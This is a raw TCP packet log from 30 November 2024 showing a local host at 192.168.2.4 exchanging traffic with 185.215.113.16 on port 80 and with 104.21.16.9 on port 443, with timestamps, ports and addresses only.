Nov 30, 2024 04:06:33.600198984 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:33.600472927 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:33.720813036 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:33.721041918 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:33.721163988 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:33.722589016 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:33.726385117 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:33.838042021 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:33.838084936 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:33.838160038 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:33.838402987 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:33.838419914 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:33.846265078 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109081030 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109117985 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109131098 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109143019 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.109169006 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.109169006 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.109244108 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109255075 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109287977 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.109298944 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109311104 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109319925 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109333038 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109342098 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.109360933 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.109369993 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.109545946 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.109594107 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.144831896 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:35.144898891 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:35.173132896 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:35.173149109 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:35.173352003 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:35.174505949 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:35.174635887 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:35.174668074 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:35.174721003 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:35.174730062 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:35.229140997 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.229187965 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.229266882 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.229315042 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.233329058 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.233374119 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.310178995 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.310231924 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.310355902 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.310396910 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.314393997 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.314431906 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.314498901 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.314536095 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.322812080 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.322860003 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.322884083 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.322920084 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.331243992 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.331291914 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.331348896 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.331389904 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.339654922 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.339701891 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.339746952 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.339787006 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.348129034 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.348170042 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.348242998 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.348284006 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.356527090 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.356569052 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.356611967 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.356653929 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.367168903 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.367181063 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.367213964 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.367225885 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.373379946 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.373421907 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.373483896 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.373533010 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.380992889 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.381038904 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.381109953 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.381153107 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.388674974 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.388719082 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.388761044 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.388801098 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.396286964 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.396328926 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.511434078 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.511450052 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.511482954 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.511498928 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.513824940 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.513873100 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.513961077 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.514065981 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.518775940 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.518827915 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.518893003 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.518930912 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.523734093 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.523777008 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.523834944 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.523873091 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.528665066 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.528702974 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.528827906 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.528871059 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.533622026 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.533672094 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.533715963 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.533759117 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.538558006 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.538602114 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.538671017 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.538711071 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.543509960 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.543551922 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.543613911 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.543664932 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.548463106 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.548506021 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.548569918 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.548607111 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.553416967 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.553461075 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.553610086 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.553651094 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.558343887 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.558392048 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.558470964 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.558509111 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.563297033 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.563344955 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.563406944 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.563446999 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.568265915 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.568315983 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.568393946 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.568433046 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.573190928 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.573232889 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.573291063 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.573333025 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.578130007 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.578176022 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.578233004 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.578277111 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.583080053 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.583125114 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.583184004 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.583338022 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.588087082 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.588140965 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.588144064 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.588206053 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.592964888 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.593013048 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.593075991 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.593113899 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.597932100 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.597984076 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.598033905 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.598078012 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.602874994 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.602922916 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.602977991 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.603025913 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.607836008 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.607882977 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.607935905 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.607979059 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.612762928 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.612881899 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.612962961 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.617675066 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.617727995 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.712810040 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.712857008 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.712884903 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.712924957 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.714741945 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.714787960 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.714930058 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.714972019 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.718733072 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.718770027 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.718836069 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.718874931 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.722662926 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.722698927 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.722740889 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.722780943 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.726458073 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.726495028 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.726563931 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.726603031 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.730192900 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.730232954 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.730295897 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.730335951 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.733894110 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.733930111 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.734004021 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.734044075 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.737529993 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.737579107 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.737623930 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.737663984 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.741033077 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.741075993 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.741132021 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.741177082 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.744498968 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.744545937 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.744626045 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.744669914 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.747989893 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.748042107 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.748179913 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.748223066 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.751439095 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.751466036 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.751485109 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.751497984 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.754817963 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.754870892 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.754916906 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.754960060 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.758261919 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.758322954 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.758363962 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.758440018 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.761715889 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.761773109 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.761811018 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.761848927 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.765144110 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.765197992 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.765239954 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.765279055 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.768587112 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.768639088 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.768695116 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.768738031 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.772023916 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.772080898 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.772145033 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.772186041 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.775476933 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.775578022 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.775580883 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.775626898 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.778932095 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.778981924 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.779046059 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.779088974 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.782341003 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.782387972 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.782445908 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.782624960 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.785804033 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.785856009 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.785909891 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.785953045 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.789248943 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.789290905 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.789350986 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.789392948 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.792675018 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.792752981 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.792788982 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.792834997 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.796117067 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.796160936 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.796220064 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.796258926 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.799566984 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.799612045 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.799685001 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.799724102 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.803009033 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.803117037 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.803122997 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.803163052 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.806464911 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.806514978 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.806534052 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.806576967 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.809906006 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.809957027 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.810007095 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.810050964 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.813345909 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.813393116 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.813463926 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.813508987 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.816771030 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.816821098 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.816890955 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.816934109 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.820251942 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.820297956 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.820355892 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.820404053 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.823662043 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.823715925 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.913997889 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.914083004 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.914122105 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.914272070 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.915252924 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.915298939 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.915365934 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.915412903 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.917784929 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.917833090 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.917896986 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.917941093 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.920361996 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.920406103 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.920478106 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.920520067 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.922962904 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.923011065 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.923067093 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.923110008 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.925404072 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.925451040 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.925513983 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.925556898 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.927865028 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.927911043 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.927956104 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.927999020 CET	49822	80	192.168.2.4	185.215.113.16
